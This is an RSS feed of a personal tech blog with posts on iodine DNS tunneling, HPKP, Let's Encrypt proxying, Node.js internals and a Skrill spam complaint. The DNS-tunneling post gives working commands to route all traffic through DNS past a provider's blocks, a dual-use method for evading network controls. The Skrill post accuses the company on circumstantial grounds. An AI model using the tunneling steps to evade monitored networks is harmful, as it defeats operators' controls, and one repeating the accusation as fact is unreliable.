<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Purple haze]]></title><description><![CDATA[My blog is better than someone else's blog]]></description><link>http://blog.roundside.com/</link><generator>Ghost v0.4.2</generator><lastBuildDate>Mon, 20 Apr 2026 01:21:51 GMT</lastBuildDate><atom:link href="http://blog.roundside.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[DNS tunneling to the rescue]]></title><description><![CDATA[<h3 id="stucksomewherewithouttheinternetreadon">Stuck somewhere without the Internet? Read on!</h3>

<blockquote>
  <p>This is just another post about Iodine and DNS tunneling. Some kind of memo.</p>
</blockquote>

<p>So, your service provider blocks almost everything but DNS queries? It's time for Iodine.</p>

<p><a href='https://github.com/yarrick/iodine' >DNS tunneling</a> is neither the fastest option (compared to a VPN or ICMP tunneling) nor the most convenient, but it works almost everywhere.</p>

<p>All that's needed is your own domain name, a server running iodined, and a client running iodine.</p>

<blockquote>
  <p>It's important to run the same version on the client and the server; there is no backward compatibility.</p>
</blockquote>

<p>Set up the subdomains:</p>

<ul>
<li>an <strong>A</strong> record, <strong>iodine.example.org</strong>, pointing to the <strong>Iodine server's</strong> IP address</li>
<li>an <strong>NS</strong> record for <strong>tun.example.org</strong> pointing to <strong>iodine.example.org</strong>, so that zone is delegated to the Iodine server</li>
</ul>
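
<p>In BIND zone-file syntax, the records above might look like this (a sketch; 198.51.100.5 is a stand-in for the Iodine server's address):</p>

```
; fragment of the example.org zone
iodine  IN  A   198.51.100.5         ; the Iodine server itself
tun     IN  NS  iodine.example.org.  ; delegate tun.example.org to it
```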

<p>OK, now all requests to *.tun.example.org should go to Iodine. <br />
Start server:</p>

<pre><code class="shell">iodined -c -f 10.10.10.1 tun.example.org -P p@SSwoRd -DD  
</code></pre>

<ul>
<li><strong>-c</strong> - disable checks on the client IP address</li>
<li><strong>-f</strong> - run in the foreground</li>
<li><strong>10.10.10.1</strong> - address/subnet for the virtual network</li>
<li><strong>tun.example.org</strong> - the domain to listen for</li>
<li><strong>-P</strong> - password</li>
<li><strong>-DD</strong> - double debug output</li>
</ul>

<p>Let's check it (online check is available at <a href='http://code.kryo.se/iodine/check-it/' >http://code.kryo.se/iodine/check-it/</a>):</p>

<pre><code class="bash">dig srv z001.tun.example.org +short  
hpiyxampo.md.

dig txt z1.tun.example.org +short  
"tpiys2"  
</code></pre>

<p>Iodine replies with a short random string to any query starting with 'z'.</p>

<p>Now, let's start iodine client:</p>

<pre><code class="shell">iodine -r -m226 -OBase64u -L0 -P p@SSwoRd tun.example.org  
</code></pre>

<ul>
<li><strong>-r</strong> - skip raw UDP mode</li>
<li><strong>-m226</strong> - set a fragment size of 226 bytes</li>
<li><strong>-OBase64u</strong> - force the downstream encoding to Base64u</li>
<li><strong>-L0</strong> - force legacy (non-lazy) mode</li>
<li><strong>tun.example.org</strong> - the domain to use for queries</li>
</ul>

<p>A great article with more examples is available <a href='http://wiki.attie.co.uk/wiki/Tunnel_IP_through_DNS' >here</a>.</p>

<p>Cool, let's try to ping the server via the virtual dns0 device:</p>

<pre><code class="shell">[root@host ~ ] ping 10.10.10.1
PING 10.10.10.1 (10.10.10.1) 56(84) bytes of data.  
64 bytes from 10.10.10.1: icmp_seq=1 ttl=64 time=50.6 ms  
64 bytes from 10.10.10.1: icmp_seq=2 ttl=64 time=54.2 ms  
64 bytes from 10.10.10.1: icmp_seq=3 ttl=64 time=65.9 ms  
64 bytes from 10.10.10.1: icmp_seq=4 ttl=64 time=63.4 ms  
^C
--- 10.10.10.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms  
rtt min/avg/max/mdev = 50.666/58.604/65.983/6.324 ms  
</code></pre>

<p>So far so good.</p>

<p>The final part: <strong>routing</strong>.</p>

<p>The easiest way to route requests through the Iodine server is SSH dynamic tunneling (<code>ssh -D ${port} user@server</code>), which creates a SOCKS server on the host machine. <br />
But if our traffic is already encrypted with TLS or another suite, we can route it all directly through the DNS tunnel (note that Iodine's <strong>password is used for authentication only</strong>; <strong>the data itself is not encrypted at all</strong>).</p>

<p>The server needs IP forwarding enabled, plus NAT and ACCEPT rules (or an ACCEPT policy) in the FORWARD chain:</p>

<pre><code class="bash">echo 1 &gt; /proc/sys/net/ipv4/ip_forward &amp;&amp;  
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -j MASQUERADE  
</code></pre>

<p>To route all traffic through the tunnel:</p>

<ul>
<li>look up the service provider's DNS resolvers and the current default gateway</li>
</ul>

<pre><code class="shell">[user@host ~ ] cat /etc/resolv.conf
nameserver 10.10.100.117  
nameserver 10.10.100.118

[user@host ~ ] ip r
default via 10.11.58.1 dev wlan0  
10.11.58.0/24 dev wlan0 proto kernel scope link src 10.11.58.114  
</code></pre>

<ul>
<li>add host routes to those DNS servers via the old gateway</li>
</ul>

<pre><code class="bash">route add -host 10.10.100.117 gw 10.11.58.1  
route add -host 10.10.100.118 gw 10.11.58.1  
</code></pre>

<ul>
<li>delete the default route and point it at the tunnel (10.10.10.1 on dns0)</li>
</ul>

<pre><code class="bash">ip r del default &amp;&amp; ip r add default via 10.10.10.1  
</code></pre>

<pre><code>[user@host ~ ] ip r
default via 10.10.10.1 dev dns0  
10.10.10.0/27 dev dns0 proto kernel scope link src 10.10.10.2  
10.10.100.117 via 10.11.58.1 dev wlan0  
10.10.100.118 via 10.11.58.1 dev wlan0  
10.11.58.0/24 dev wlan0 proto kernel scope link src 10.11.58.114  
</code></pre>
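
<p>The whole routing procedure can be rolled into one small script (a sketch; it reuses the hypothetical addresses from the listings above and must run as root):</p>

```shell
#!/bin/sh
# values taken from the example listings above; adjust for your network
OLD_GW=10.11.58.1                        # provider's default gateway
RESOLVERS="10.10.100.117 10.10.100.118"  # provider's DNS servers
TUNNEL_GW=10.10.10.1                     # iodined's end of the tunnel

# keep DNS queries flowing over the real uplink
for r in $RESOLVERS; do
    ip route add "$r" via "$OLD_GW"
done

# send everything else through the DNS tunnel
ip route del default
ip route add default via "$TUNNEL_GW"
```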

<ul>
<li>yup:</li>
</ul>

<pre><code>[root@jupiter ~ ] ping example.org -c 3
PING example.org (93.184.216.34) 56(84) bytes of data.  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=1 ttl=53 time=1023 ms  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=2 ttl=53 time=1025 ms  
64 bytes from 93.184.216.34 (93.184.216.34): icmp_seq=3 ttl=53 time=2047 ms

--- example.org ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2047ms  
rtt min/avg/max/mdev = 1023.155/1365.228/2047.387/482.360 ms, pipe 2  
</code></pre>

<p>Thanks for reading.</p>]]></description><link>http://blog.roundside.com/dns-tunneling-to-the-rescue/</link><guid isPermaLink="false">5712153b-2a99-41b5-a316-d6c653ffa9da</guid><category><![CDATA[fun]]></category><category><![CDATA[linux]]></category><category><![CDATA[networking]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 27 Aug 2017 22:13:35 GMT</pubDate></item><item><title><![CDATA[Why you should  never use your primary email address with Skrill]]></title><description><![CDATA[<h3 id="astoryaboutskrillcasinorelatedspam">A story about Skrill casino related spam</h3>

<p>Recently I created an account on <a href='https://www.skrill.com/' >Skrill</a> (ex Moneybookers) to receive payments directly to my credit card. <br />
Just a common thing, I thought. How wrong I was...</p>

<p>The next morning after registration I was really <strong>surprised</strong>.</p>

<p>I saw about <strong>two thousand</strong> delivery-error messages from different SMTP servers. All of them had a "return-path" set to my domain email address (info@mydomain.com) and were sent from many different servers. What the hell?</p>

<p>I also saw a lot of spam sent to the email address I had used to register the Skrill account (that address was also used for a while on Cloudflare). Those emails contained my first and last names, and my last name was set on my <strong>Skrill account only</strong>. </p>

<p>Here are some subjects from those spam messages:</p>

<ul>
<li>"Sign up now and you can redeem your £€$1000 FREE immediately!"</li>
<li>"Casino Classic offers all new real cash players £€$500 and 1 hour to win!"</li>
<li>"CasinoClassic is offering 500 free with one hour play to all new account holders!"</li>
</ul>

<p>I googled around and found a lot of posts like <a href='http://www.webhostingtalk.com/showthread.php?t=1110225' >this</a>. That post is dated 2011, so five years later <strong>Skrill is still selling your email address to spammers</strong>. </p>

<p>I don't know what else to say, besides that Skrill is a piece of sh*t. A good company, especially a financial one, would never give any of your information to spammers.</p>

<p><strong>If you still decide to use Skrill, use a public email service</strong>; never use your own domain-based email, otherwise you may have real trouble with spam.</p>

<p>Take care.</p>]]></description><link>http://blog.roundside.com/why-you-should-almost-never-usu-your-own-email-address-with-skrill/</link><guid isPermaLink="false">4bb73fda-8213-4aae-a4df-c2a8d05dd186</guid><category><![CDATA[spam]]></category><category><![CDATA[skrill]]></category><category><![CDATA[money]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Fri, 23 Sep 2016 02:24:48 GMT</pubDate></item><item><title><![CDATA[HPKP as another security layer]]></title><description><![CDATA[<h3 id="usinghttppublickeypinningforsuperdupersecurity">Using HTTP Public Key Pinning for SuperDuper ™ security</h3>

<p>Happily, <a href='https://developer.mozilla.org/en-US/docs/Web/Security/HTTP_strict_transport_security' >HTTP Strict Transport Security</a> is a very nice thing for trust-on-first-use sites. But there is one thing that haunts me sometimes: a hacked CA. Sure, that's quite rare, but who knows. <br />
Say some attackers want to do some MITM. They hack some CA, issue fake (but valid) SSL certificates and ... the end. Or not?</p>

<p>Not if <a href='https://developer.mozilla.org/en/docs/Web/Security/Public_Key_Pinning' >HPKP</a> is used and it's a TOFU web site. <br />
The idea is pretty simple: <br />
when the UA makes its first trusted (I hope) connection to the server, it receives the HPKP header(s) and stores the certificates' SPKI fingerprints, a TTL, and other validation options for that domain. Then, on every further connection, the UA checks the certificate's identity (the whole validation process is described in <a href='https://tools.ietf.org/html/rfc7469#section-2.6' >RFC 7469</a>).</p>

<p>An HPKP header looks like this:</p>

<pre><code>Public-Key-Pins: max-age=2592000;  
       pin-sha256="E9CZ9INDbd+2eRQozYqqbQ2yXLVKB9+xcprMF+44U1g=";
       pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=";
       report-uri="http://example.com/pkp-report";
       includeSubDomains
</code></pre>

<p>where <br />
<strong><em>max-age</em></strong> - TTL for storing the header and fingerprints <br />
<strong><em>pin-sha256</em></strong> - SPKI fingerprints (SHA-256 is the only hash supported for now); at least two pins are required <br />
<strong><em>report-uri</em></strong> - URI to send a POST report to when validation fails (optional) <br />
<strong><em>includeSubDomains</em></strong> - extend pinning to subdomains (optional)    </p>

<h4 id="okitsagametime">Ok, it's game time</h4>

<p><strong><em>Let's create Subject Public Key Info fingerprints for example.org</em></strong> (details about SPKI are <a href='https://tools.ietf.org/html/rfc7469#section-2.4' >here</a>) <br />
The easiest way is to create one from the server certificate using openssl:  </p>

<pre><code class="nohighlight">openssl s_client -servername example.org -connect example.org:443 &lt;/dev/null | openssl x509 -pubkey -noout | openssl rsa -pubin -outform der | openssl dgst -sha256 -binary | openssl enc -base64  
</code></pre>

<p>Here it is  </p>

<pre><code>depth=2 O = Digital Signature Trust Co., CN = DST Root CA X3  
verify return:1  
depth=1 C = US, O = Let's Encrypt, CN = Let's Encrypt Authority X1  
verify return:1  
depth=0 CN = example.org  
verify return:1  
writing RSA key  
TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c=  
</code></pre>

<p>Now it's time to add this key to the header and set a TTL for pinning. But before doing this, we need another SPKI fingerprint for the bad situation when the original key gets compromised. Per the <a href='https://tools.ietf.org/html/rfc7469' >RFC</a>, the header must contain <strong>at least two pins</strong>. So, for correct pinning we need at least two private keys and certificates: <strong>the original and a backup</strong> (preferably from another CA). Sure, no one can forbid us from putting some garbage in the backup pin(s), just for testing purposes.</p>
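
<p>A backup pin can be prepared from a freshly generated key that is kept offline (a sketch; the key size and file name are arbitrary):</p>

```shell
# generate a backup key pair and keep it offline
openssl genrsa -out backup.key 2048

# compute the SPKI fingerprint of its public half
openssl rsa -in backup.key -pubout -outform der | openssl dgst -sha256 -binary | openssl enc -base64
```

<p>The result is a 44-character Base64 string that can go straight into a second pin-sha256 directive.</p>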

<p><strong><em>About max-age</em></strong></p>

<p>There is no hard limit for max-age, but UAs <strong>may set their own limits</strong>. The RFC suggests a value on the order of 60 days:</p>

<blockquote>
  <p>There is probably no ideal upper limit to the max-age directive that
     would satisfy all use cases.  However, a value on the order of 60
     days (5,184,000 seconds) may be considered a balance between the two
     competing security concerns.</p>
</blockquote>

<p><strong><em>About report-uri</em></strong>  </p>

<p>A very cool feature, in my opinion. The UA will make a POST request with useful info to the specified URI when a valid pinned connection can't be established. The little problem: only Chrome &gt;=46 (and Chromium, I suppose) can do this for now.</p>

<p>Sample HPKP-report from Chrome:</p>

<pre><code>#headers
{ host: 'blog.roundside.com',
  connection: 'close',
  'content-length': '8710',
  pragma: 'no-cache',
  'cache-control': 'no-cache',
  'user-agent': 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36',
  'accept-encoding': 'gzip, deflate',
  'accept-language': 'en-US,en;q=0.8' }
#payload (certificates were truncated)
{
"date-time":"2016-03-13T16:54:14.023Z",  
"effective-expiration-date":"2016-03-13T16:57:54.368Z",  
"hostname":"blog.roundside.com",  
"include-subdomains":false,  
"known-pins":[  
"pin-sha256=\"MbJIcRLFNfwcfRUpV46EtDyp0d8WO8o34sMALixkftU=\"",  
"pin-sha256=\"w5k2T/1B4J1cdxlhfUnpY1SIL1+n26NFv8fTdEs2ThM=\""],  
"noted-hostname":"blog.roundside.com",  
"port":443,  
"served-certificate-chain":[  
"-----BEGIN CERTIFICATE-----    \nMIIFCDCCA/CgAwIBAgISAUijX+5SwJtgdqwJUUDBNjrCMA0GCSqGSIb3DQEBCwUA\nMEoxCzAJBgNVBAYTAlVTMRYwFAYD....Y4=\n  
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----  
\n...2k5xeua2zUk=\n
-----END CERTIFICATE-----\n"
],
"validated-certificate-chain":[  
"-----BEGIN CERTIFICATE-----\n  
...4=\n
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----\n  
...2k5xeua2zUk=\n
-----END CERTIFICATE-----\n",
"-----BEGIN CERTIFICATE-----\n  
MII....UQ\n  
-----END CERTIFICATE-----\n"
]}
</code></pre>

<p><em><strong>served-certificate-chain</strong></em> - exactly the certificate chain received from the server. <br />
<em><strong>validated-certificate-chain</strong></em> - what the UA tries to verify after the first failure; usually the same as <strong>served-certificate-chain</strong> plus the Root CA certificate from the UA's store.</p>

<p>Ok, so let's set up a proper header using the SPKI fingerprints and the recommended max-age:</p>

<pre><code>Public-Key-Pins:  
pin-sha256="TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c=";  
pin-sha256="M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE=";  
max-age=5184000;  
report-uri="http://example.org/pkp-report"  
</code></pre>
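
<p>One way to serve that header from nginx (a sketch; the <code>always</code> parameter needs nginx 1.7.5 or newer):</p>

```
add_header Public-Key-Pins 'pin-sha256="TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c="; pin-sha256="M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE="; max-age=5184000; report-uri="http://example.org/pkp-report"' always;
```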

<p>Check it:</p>

<pre><code>curl -I "https://example.org"  
HTTP/1.1 200 OK  
Public-Key-Pins: pin-sha256="TCKhYNyE/2K3N+Latb1KNH/iXqLDjmAkZhCHzN5N20c="; pin-sha256="M8HztCzM3elUxkcjR2S5P4hhyBNf6lHkmjAHKhpGPWE="; max-age=5184000; report-uri="http://example.org/pkp-report";  
Date: Mon, 14 Mar 2016 00:23:29 GMT  
Connection: keep-alive
</code></pre>

<p>Seems ok.</p>

<p><em><strong>How to test?</strong></em> <br />
Testing pinned connections is not trivial for now. There are a few ways to check HPKP status: in <strong>Firefox</strong>, the "Network" tab -&gt; "Security" panel shows "Public Key Pinning"; the <a href='https://report-uri.io/home/pkp_analyse' >HPKP Analyser</a> is also a good tool.</p>

<p>To actually test HPKP we need to <strong>replace the pinned certificate with another valid, but unpinned, certificate</strong>. Just changing the fingerprints has no effect, because the UA can't update the HPKP header while the certificate and the fingerprints conflict, and will keep the old header unchanged.</p>

<p><strong>Ok, let's put an unpinned certificate on this blog</strong>    </p>

<p><em>Chrome reaction:</em> <br />
<img src='http://files.roundside.com/content/hpkp_ch.png' > <br />
<em>Firefox reaction:</em> <br />
<img src='http://files.roundside.com/content/hpkp_ff.png' ></p>

<p>The cool thing: there is no "proceed anyway" button, which is very good for security.</p>

<p><em><strong>So, HPKP &amp; HSTS are not ideal, but they can greatly reduce MITM attacks.</strong></em></p>

<p>Further reading: <br />
<a href='https://tools.ietf.org/html/rfc7469' >RFC</a> <br />
<a href='https://developer.mozilla.org/en/docs/Web/Security/Public_Key_Pinning' >MDN</a> <br />
<a href='https://developers.google.com/web/updates/2015/09/HPKP-reporting-with-chrome-46?hl=en' >Google</a> <br />
<a href='https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning' >OWASP</a> <br />
<a href='https://report-uri.io/home/pkp_analyse' >HPKP Analyser</a></p>]]></description><link>http://blog.roundside.com/hpkp-as-another-security-layer/</link><guid isPermaLink="false">a246fcea-40f2-47a2-b2c0-86583dcc1d3a</guid><category><![CDATA[security]]></category><category><![CDATA[http]]></category><category><![CDATA[ssl]]></category><category><![CDATA[https]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Sun, 13 Mar 2016 19:08:29 GMT</pubDate></item><item><title><![CDATA[Proxying letsencrypt acme-challenge requests]]></title><description><![CDATA[<p><img src='https://letsencrypt.org/images/letsencrypt-logo-horizontal.svg' > <br />
<a href='https://letsencrypt.org/' >Let’s Encrypt</a> is cool enough. But I personally ran into a problem with FQDN verification: the letsencrypt client should be invoked from the same IP address that the domain resolves to.   </p>

<p>So if you want an SSL certificate for <strong>example.org</strong> (which, say, has the IPv4 address 93.184.216.34) but want to generate the certificate(s) from some other server, <strong>letsencrypt.example.org</strong> (e.g. a micro AWS instance with IP 93.184.216.32), you're out of luck. There are several workarounds described in the <a href='https://letsencrypt.github.io/acme-spec/#rfc.section.7' >spec</a>, but they can't be automated easily; moreover, certificates are issued for 90 days, so automation is a good choice here.</p>

<p>But if you own your servers or have access to the server/application configs, there is an elegant solution. We just need to proxy the Let's Encrypt acme-challenge requests from <strong>example.org</strong> to the server where letsencrypt runs, and use the native <a href='http://letsencrypt.readthedocs.org/en/latest/using.html#webroot' >webroot</a> plugin (<a href='http://letsencrypt.readthedocs.org/en/latest/using.html#standalone' >standalone</a> is also usable, but not flexible at all).</p>

<p>In a nutshell:</p>

<p>The Let’s Encrypt service wants to receive an acme-challenge from example.org, so it makes a request to a unique address (a hash) under the <code>/.well-known/acme-challenge/</code> path. When <code>example.org/.well-known/acme-challenge/{$hash}</code> serves the correct hash path and value, the certificate will be issued.</p>

<p>The process looks something like this:  </p>

<pre><code class="syntax-bash">#the letsencrypt client sends the dns name, hash and value to the letsencrypt service
1) letsencrypt.example.org -&gt; letsencrypt service [example.org &amp; $hash &amp; $value]  
#the letsencrypt service makes the request and obtains the value (if any)
2) letsencrypt service -&gt; example.org/.well-known/acme-challenge/{$hash}  
#and if everything is ok
3) letsencrypt service -&gt; letsencrypt.example.org &lt;storing key and certificate&gt;  
</code></pre>

<p>Example from <a href='http://letsencrypt.readthedocs.org/en/latest/using.html#webroot' >http://letsencrypt.readthedocs.org/</a>:  </p>

<pre><code>66.133.109.36 - - [05/Jan/2016:20:11:24 -0500] "GET /.well-known/acme-challenge/HGr8U1IeTW4kY_Z6UIyaakzOkyQgPr_7ArlLgtZE8SX HTTP/1.1" 200 87 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"  
</code></pre>

<p>First of all, we need to specify the webroot <a href='http://letsencrypt.readthedocs.org/en/latest/using.html#webroot' >plugin</a> as the <strong>authenticator</strong> (used with <code>certonly</code>) and the acme-challenge webroot <strong>location</strong> for the letsencrypt client:</p>

<pre><code>./letsencrypt-auto certonly -w /opt/ssl/example.org --authenticator webroot --email bob@example.org -d example.org
</code></pre>

<p>In this case, the letsencrypt client writes the verification file to /opt/ssl/example.org and tells the Let's Encrypt service to make the verification request.</p>

<p>Now, just one simple change in <strong>example.org</strong> server config (nginx in my case):</p>

<pre><code>location  "/.well-known/acme-challenge/" {  
    proxy_pass http://letsencrypt.example.org;  
}
</code></pre>

<p>Ok, all acme-challenge requests now go to <strong>letsencrypt.example.org</strong>:</p>

<pre><code>letsencrypt service -&gt; example.org/.well-known/acme-challenge/{$hash} -&gt; letsencrypt.example.org  
</code></pre>

<p>And now we just need to <strong>serve the acme-challenge hash file</strong> using your favorite method (nginx, Node, Python, netcat :D). For testing, a Python one-liner is enough:  </p>

<pre><code>cd /opt/ssl/example.org &amp;&amp; python -m "SimpleHTTPServer" 80  
</code></pre>
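
<p>To sanity-check the serving side without involving Let's Encrypt at all, drop a dummy token into the webroot and fetch it back (a sketch; the port, paths and token are arbitrary, and Python 3 is assumed):</p>

```shell
# put a dummy token where the challenge files will live
mkdir -p /tmp/webroot/.well-known/acme-challenge
echo "test-value" > /tmp/webroot/.well-known/acme-challenge/test-token

# serve the webroot and fetch the token back
python3 -m http.server 8080 --directory /tmp/webroot &
SRV=$!
sleep 1
curl -s http://127.0.0.1:8080/.well-known/acme-challenge/test-token
kill $SRV
```

<p>If curl prints the token back, the real challenge files will be reachable the same way.</p>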

<p>Ok, cool:  </p>

<pre><code>IMPORTANT NOTES:  
 - Congratulations! Your certificate and chain have been saved at
   /etc/letsencrypt/live/example.org/fullchain.pem. Your cert
   will expire on 2016-06-03. To obtain a new version of the
   certificate in the future, simply run Let's Encrypt again.
 - If you like Let's Encrypt, please consider supporting our work by:

   Donating to ISRG / Let's Encrypt:   https://letsencrypt.org/donate
   Donating to EFF:                    https://eff.org/donate-le
</code></pre>

<p>This method is extremely easy to configure and automate for receiving certificates for dozens of different domains through a single letsencrypt endpoint.</p>
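
<p>Since the whole flow is non-interactive, re-issuing can be scheduled as well; a crontab entry might look like this (a sketch reusing the command from above; the schedule and paths are assumptions to adapt):</p>

```
# hypothetical monthly re-issue, reloading nginx on success
0 4 1 * * /opt/letsencrypt/letsencrypt-auto certonly -w /opt/ssl/example.org --authenticator webroot --email bob@example.org -d example.org && nginx -s reload
```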

<p><em>Note: Let's Encrypt has a rate limit (around 5 certificates per domain per week).</em></p>

<p>Cheers :)</p>]]></description><link>http://blog.roundside.com/proxying-letsencrypt-acme-challenge-requests/</link><guid isPermaLink="false">ed825179-6575-428c-bebe-cfc479f108ce</guid><category><![CDATA[ssl]]></category><category><![CDATA[servers]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Tue, 01 Mar 2016 08:41:00 GMT</pubDate></item><item><title><![CDATA[Using internal HTTPParser for fun and tests]]></title><description><![CDATA[<p>If you want to use Node's http(s) library but don't want to run or simulate an HTTP server, read on :)</p>

<p>So, to use the native HTTP parser, which in a nutshell is a C library bound into Node with a bunch of internal helpers and local functions, we need just a few lines of code.</p>

<pre><code class="code-javascript">/**
 * using internal .binding method
 */

var HTTPParser = process.binding('http_parser').HTTPParser;

/**
 * specify that we want to parse a request
 *  HTTPParser.REQUEST == 1
 *  HTTPParser.RESPONSE == 0
 */

var parser = new HTTPParser(HTTPParser.REQUEST);

//alias to console.log, just for convenience
var log = console.log;

/**
 * creates new Buffer and pass it to parser
 * @param {Buffer} buffer
 */

function parse(buffer) {  
  var _data = new Buffer(buffer);
  //this method is described below
  parser.execute(_data, 0, _data.length);
}

/**
 * set event emitters
 */

parser.onHeadersComplete = function(headers) {  
    log(".onHeadersComplete, arguments: \n%s\n", JSON.stringify(arguments));
}
parser.onMessageComplete = function() {  
    log(".onMessageComplete invoked");
}
parser.onBody = function(body, start, len) {  
    log(".onBody, arguments: \n%s\n", JSON.stringify(arguments));
    log(body.toString());
}

/**
 * Make tests with proper requests
 */

//single string
parse("GET / HTTP/1.1\r\nhost:google.com\r\ncontent-length: 0\r\n\r\n");

//multiline
parse("PUT /api/v1/spot HTTP/1.1\r\n");  
parse("content-type: application/json\r\n");  
parse("host: example.com\r\ncontent-length:31\r\n\r\n");  
parse("{\"stock\": \"AAPL\", \"price\": 643}");
</code></pre>

<p>Results: <br />
single string  </p>

<pre><code class="code-javascript">.onHeadersComplete, arguments: 
{"0":{"headers":["host","google.com","content-length","0"],"url":"/","method":"GET","versionMajor":1,"versionMinor":1,"shouldKeepAlive":true,"upgrade":false}}

.onMessageComplete invoked
</code></pre>

<p>and multiline one  </p>

<pre><code class="code-javascript">.onHeadersComplete, arguments: 
{"0":{"headers":["content-type","application/json","host","example.com","content-length","31"],"url":"/api/v1/spot","method":"PUT","versionMajor":1,"versionMinor":1,"shouldKeepAlive":true,"upgrade":false}}

.onBody, arguments: 
{"0":[123,34,115,116,111,99,107,34,58,32,34,65,65,80,76,34,44,32,34,112,114,105,99,101,34,58,32,54,52,51,125],"1":0,"2":31}

{"stock": "AAPL", "price": 643}
.onMessageComplete invoked
</code></pre>

<p>Cool, we have headers, request line and body buffer.</p>

<hr />

<p>Btw, the <strong>.execute</strong> method takes the data buffer, a start offset, and a length. <br />
Let's take a peek at <code>http.js:2167</code>:</p>

<pre><code class="code-javascript">function socketOnData(d, start, end) {  
  var socket = this;
  var req = this._httpMessage;
  var parser = this.parser;

  var ret = parser.execute(d, start, end - start);
  if (ret instanceof Error) {
    debug('parse error');
    freeParser(parser, req);
    socket.destroy();
    req.emit('error', ret);
    req._hadError = true;
  } else if (parser.incoming &amp;&amp; parser.incoming.upgrade) {
    // Upgrade or CONNECT
    var bytesParsed = ret; 
    var res = parser.incoming;
    req.res = res;
    ...
</code></pre>

<p>Also, <a href='https://www.npmjs.com/~loadaverage' >here</a> is an npm module with this stuff.</p>]]></description><link>http://blog.roundside.com/using-internal-httpparser-for-fun-and-tests/</link><guid isPermaLink="false">c988d3d9-9115-42b4-a183-c16b2e2af9e0</guid><category><![CDATA[node.js]]></category><category><![CDATA[http]]></category><category><![CDATA[parsing]]></category><dc:creator><![CDATA[Vadim]]></dc:creator><pubDate>Fri, 12 Feb 2016 08:16:09 GMT</pubDate></item><item><title><![CDATA[Clustering Node.js apps]]></title><description><![CDATA[<p>Yes, Node is fast enough. But it uses only a single thread, so in most cases we can make it much faster (on multi-core systems, of course).</p>

<p>Nice documentation about clustering in Node.js is <a href='https://nodejs.org/api/cluster.html' >here</a></p>

<p>In a nutshell, the master process simply shares incoming connections between the forked worker processes. There are also some useful events for monitoring the workers and re-forking them in case of trouble.</p>

<p>Let's create an extra-simple web server:  </p>

<pre><code class="syntax=javascript">var http = require('http');  
http.createServer(function (req, res) {  
  res.writeHead(200, {'content-type': 'text/plain'});
  res.end('Hello World!');
}).listen(3000)
</code></pre>

<p>I'll use <strong>wrk</strong> to run the benchmark from the <strong>incredible</strong> <a href='https://github.com/iron/iron/wiki/How-to-Benchmark-hello.rs-Example' >Iron</a> web framework for Rust. On my quad-core VPS the results aren't bad:  </p>

<pre><code>Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency   140.61ms   69.12ms 785.85ms   88.44%
    Req/Sec   398.78    247.27     1.28k    62.36%
  46600 requests in 10.03s, 6.93MB read
Requests/sec:   4646.52  
Transfer/sec:    707.87KB
</code></pre>

<p>Hmm, <strong>4646.52 requests per second</strong>. <br />
Now, let's speed it up!  </p>

<pre><code class="syntax=javascript">var http     = require('http'),  
    cluster  = require('cluster'),
    coresnum = require('os').cpus().length;
if (cluster.isMaster) {  
  //the master process runs first and creates as many forks as there are cores/threads in the system
  for (var i=0;i&lt;coresnum;i++) {
   cluster.fork();
  }
  cluster.on('exit', function (worker, code, signal) {
   console.log('Someone is dead, PID: ' +  worker.process.pid + ', signal: ' + signal || code);    
   cluster.fork();
  }); 
}
else {  
  //will be invoked by every fork
  http.createServer(function (req, res) {
   res.writeHead(200, {'content-type': 'text/plain'});
   res.end('Hello World!');
  }).listen(3000)
}
</code></pre>

<p>The handler for the <strong>'exit'</strong> event will re-fork any worker that gets killed/terminated/etc. <br />
Let's kill a fork:  </p>

<pre><code>$ ps ax | grep node 
17064 pts/3    Sl+    0:00 node cluster.js  
17069 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5859 /tmp/cluster.js  
17074 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5860 /tmp/cluster.js  
17075 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5861 /tmp/cluster.js  
17080 pts/3    Sl+    0:00 /usr/local/bin/node --debug-port=5862 /tmp/cluster.js  
17092 pts/2    S+     0:00 grep node  
$ kill 17074
</code></pre>

<p>Nice:  </p>

<pre><code>Someone is dead, PID: 17074, signal: SIGTERM  
</code></pre>

<p>Run wrk again:</p>

<pre><code>$ wrk -t12 -c900 -d10s http://127.0.0.1:3000/
Running 10s test @ http://127.0.0.1:3000/  
  12 threads and 900 connections
  Thread Stats   Avg      Stdev     Max   +/- Stdev
    Latency    62.34ms  144.61ms   2.00s    96.96%
    Req/Sec     1.74k   763.11     8.61k    85.76%
  178799 requests in 10.10s, 26.60MB read
  Socket errors: connect 0, read 0, write 0, timeout 413
Requests/sec:  17709.63  
Transfer/sec:      2.63MB  
</code></pre>

<p>Not bad: now we get <strong>17709.63 requests per second</strong> instead of the earlier 4646.52.</p>

